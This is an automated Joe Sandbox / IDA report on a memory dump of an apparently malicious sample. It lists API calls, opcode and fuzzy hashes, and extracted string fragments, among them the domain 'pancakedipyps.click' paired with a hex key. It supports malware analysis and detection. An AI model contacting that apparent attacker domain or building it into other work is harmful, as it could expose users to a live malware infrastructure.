                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: FreeLibrary$InitializeThunk
                                        • String ID: mj
                                        • API String ID: 764372645-1022201683
                                        • Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                        • Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
                                        • Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
                                        • Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: 23
                                        • API String ID: 237503144-326707096
                                        • Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                        • Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
                                        • Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
                                        • Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: 67
                                        • API String ID: 237503144-1886922373
                                        • Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                        • Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
                                        • Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
                                        • Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID: 67
                                        • API String ID: 237503144-1886922373
                                        • Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                        • Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
                                        • Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
                                        • Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #C}$@-$up$vC
                                        • API String ID: 0-3794437364
                                        • Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                        • Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
                                        • Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
                                        • Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 67$J$u$wq
                                        • API String ID: 0-4028943437
                                        • Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                        • Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
                                        • Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
                                        • Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                        • Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
                                        • Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
                                        • Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                        • Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
                                        • Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
                                        • Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                        • Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
                                        • Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
                                        • Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                        • Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
                                        • Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
                                        • Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: S"(w$S"(w$f
                                        • API String ID: 2994545307-891790955
                                        • Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                        • Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
                                        • Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
                                        • Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                        • Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
                                        • Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
                                        • Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 12F5927179D0FDD2822D1F4978021086$pancakedipyps.click$yD
                                        • API String ID: 0-2775505739
                                        • Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                        • Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
                                        • Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
                                        • Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: -jkhanold~m`$anold~m`$d~m`
                                        • API String ID: 0-185452761
                                        • Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                        • Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
                                        • Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
                                        • Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: M;D$>D$UUK
                                        • API String ID: 0-3649699930
                                        • Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                        • Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
                                        • Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
                                        • Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8deZ$<`>f$567
                                        • API String ID: 0-937435233
                                        • Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                        • Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
                                        • Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
                                        • Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ut$.^Nw$QRP,
                                        • API String ID: 0-2489489831
                                        • Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                        • Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
                                        • Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
                                        • Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $:$K
                                        • API String ID: 0-296352136
                                        • Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                        • Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
                                        • Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
                                        • Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$8
                                        • API String ID: 0-46163386
                                        • Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                        • Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
                                        • Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
                                        • Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /B$nB
                                        • API String ID: 0-3787476056
                                        • Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                        • Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
                                        • Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                        • Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A
                                        APIs
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID: EnvironmentExpandStrings
                                        • String ID:
                                        • API String ID: 237503144-0
                                        • Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                        • Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
                                        • Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                        • Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !'$27
                                        • API String ID: 0-1982139352
                                        • Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                        • Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
                                        • Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                        • Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: >D$UUK
                                        • API String ID: 0-1347512165
                                        • Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                        • Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
                                        • Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                        • Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ji46$rYaT
                                        • API String ID: 0-3893754386
                                        • Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                        • Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
                                        • Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                        • Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =$^\
                                        • API String ID: 0-3808277151
                                        • Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                        • Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
                                        • Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                        • Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$H
                                        • API String ID: 0-1447585844
                                        • Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                        • Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
                                        • Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                        • Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$H
                                        • API String ID: 0-1447585844
                                        • Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                        • Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
                                        • Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                        • Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$H
                                        • API String ID: 0-1447585844
                                        • Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                        • Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
                                        • Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                        • Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: n$n
                                        • API String ID: 0-3874132673
                                        • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                        • Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
                                        • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                        • Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 7$gfff
                                        • API String ID: 0-3777064726
                                        • Opcode ID: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                        • Instruction ID: 4941e5eadb7aba571cda7473ebd939308df881bd2ae5f083bfc9904c5215119c
                                        • Opcode Fuzzy Hash: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                        • Instruction Fuzzy Hash: 7061F572A446118FE714CF29DC017ABB7E2EBC5314F09C62EE485DB392EB3898458B85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: XY
                                        • API String ID: 0-554446067
                                        • Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                        • Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
                                        • Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                        • Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: q
                                        • API String ID: 0-3900047139
                                        • Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                        • Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
                                        • Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                        • Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6
                                        • API String ID: 0-498629140
                                        • Opcode ID: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                        • Instruction ID: 787a559d3a6ca89598d2bb367016cd154da02af78fea546a06432564028693a7
                                        • Opcode Fuzzy Hash: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                        • Instruction Fuzzy Hash: C3322CB0405B819FD351DF39C545793BFE0AB16214F188A9EE4E9CB383D236E146CBA6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                        • Instruction ID: 5d6f820f76e102683b6000eea9d9c0854d2a53b51ca8dd83b48920ec6b395174
                                        • Opcode Fuzzy Hash: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                        • Instruction Fuzzy Hash: 096111716083548FE720CF65D841BEFB7F0FB8A308F10856CE558AB282DB7554068B8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_400000_random.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NP,?
                                        • API String ID: 0-3110377521
                                        • Opcode ID: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                        • Instruction ID: 1f4fb5fde5d3a5e7269753d163d491fe37fce05cbc84d157e3c3b696b68cf536
